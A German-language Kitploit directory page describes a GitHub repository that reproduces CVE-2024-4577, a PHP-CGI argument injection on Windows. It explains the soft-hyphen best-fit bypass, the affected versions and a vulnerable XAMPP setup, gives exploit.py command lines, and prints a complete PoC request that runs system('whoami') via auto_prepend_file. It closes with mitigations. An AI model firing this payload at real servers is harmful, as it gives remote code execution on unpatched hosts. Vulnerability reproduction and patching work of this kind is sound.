Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-4577-phpcgi_rce_reproduction — CVE-Reproduktion: cve-2024-4577-phpcgi_rce_reproduction | Kitploit
Tools/GitHubGitHub/razureink/cve-2024-4577-phpcgi_rce_reproduction
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubrazureink/cve-2024-4577-phpcgi_rce_reproduction

cve-2024-4577-phpcgi_rce_reproduction

CVE-Reproduktion: cve-2024-4577-phpcgi_rce_reproduction

Repository anzeigen
16vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-4577 – PHP-CGI-Argumentinjektion unter Windows („WorstFit“)

Überblick

CVE-2024-4577 ist eine kritische Remote-Code-Ausführungsschwachstelle in der CGI-Implementierung von PHP unter Windows. Sie umgeht den Fix für die ursprüngliche CVE-2012-1823, indem sie die Windows-„Best-Fit“-Codepage-Konvertierung ausnutzt, um Kommandozeilenargumente über die CGI-Query-String einzuschleusen.

  • CVSS-Score: 9.8 (Kritisch)
  • Entdeckt von: Orange Tsai (DEVCORE)
  • Typ: OS-Command-Injection / Argument-Injection
  • Patch-Datum: 6. Juni 2024

Technische Details

Wenn PHP als CGI-Modul (php-cgi.exe) läuft, parst es den Query-String als Kommandozeilenargumente. Der ursprüngliche Fix für CVE-2012-1823 blockierte das Zeichen - (Bindestrich, 0x2D), um eine Argumentinjektion zu verhindern. Auf Windows-Systemen, die bestimmte Codepages verwenden (z. B. Chinesisch, Japanisch, Koreanisch), konvertiert die Funktion „Best-Fit“-Zeichenzuordnung jedoch bestimmte Unicode-Zeichen in ihre nächstgelegenen ASCII-Entsprechungen.

Der entscheidende Bypass nutzt das Zeichen Soft-Hyphen (0xAD / U+00AD). Wenn eine Anfrage %AD im Query-String übergibt und das Gebietsschema des Servers eine „Best-Fit“-Codepage verwendet, konvertiert Windows intern in (Bindestrich), sodass der Angreifer trotz des Filters PHP-Argumente injizieren kann.

0xAD
0x2D

Beispiel: %ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input wird zu -d allow_url_include=1 -d auto_prepend_file=php://input.

Betroffene Versionen

  • PHP 8.1.* vor 8.1.29
  • PHP 8.2.* vor 8.2.20
  • PHP 8.3.* vor 8.3.8

Konfigurationsvoraussetzungen:

  • PHP läuft als CGI mit php-cgi.exe
  • Apache-Webserver mit konfiguriertem mod_cgi oder mod_cgid
  • Windows-Gebietsschema mit einer „Best-Fit“-Codepage (Chinesisch, Japanisch, Koreanisch usw.)

Einrichtung der Umgebung (XAMPP)

  1. Laden Sie eine anfällige PHP-Version (z. B. 8.1.28) für Windows herunter.
  2. Richten Sie XAMPP oder Apache im CGI-Modus ein:
    root@kitploit:~
    ScriptAlias /php-cgi/ "C:/php/"
    Action application/x-httpd-php-cgi /php-cgi/php-cgi.exe
    
  3. Überprüfen Sie das Ziel: http://localhost/php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input

Verwendung

root@kitploit:~
python exploit.py -t http://target/php-cgi/php-cgi.exe -c "whoami"
python exploit.py -t http://target/php-cgi/php-cgi.exe --phpinfo

PoC

Das konstruierte Payload injiziert PHP-Konfigurationsdirektiven über den Query-String:

root@kitploit:~
GET /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input
Host: target
Content-Type: application/x-www-form-urlencoded

<?php system("whoami"); ?>

Gegenmaßnahmen

  • Upgrade von PHP auf 8.3.8+, 8.2.20+ oder 8.1.29+
  • CGI-Modus deaktivieren und stattdessen PHP-FPM, mod_php oder FastCGI verwenden
  • IIS- oder Apache-Rewrite-Regeln anwenden, um Anfragen an php-cgi.exe zu blockieren
  • PHP nur auf Systemen ohne „Best-Fit“-Codepages ausführen (z. B. Englisch)

Referenzen

  • https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-en/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-4577
  • https://www.php.net/ChangeLog-8.php
  • https://github.com/php/php-src/commit/2ae601d8d0d5b42891c6e15a28a14d1f44855f09
Tool herunterladen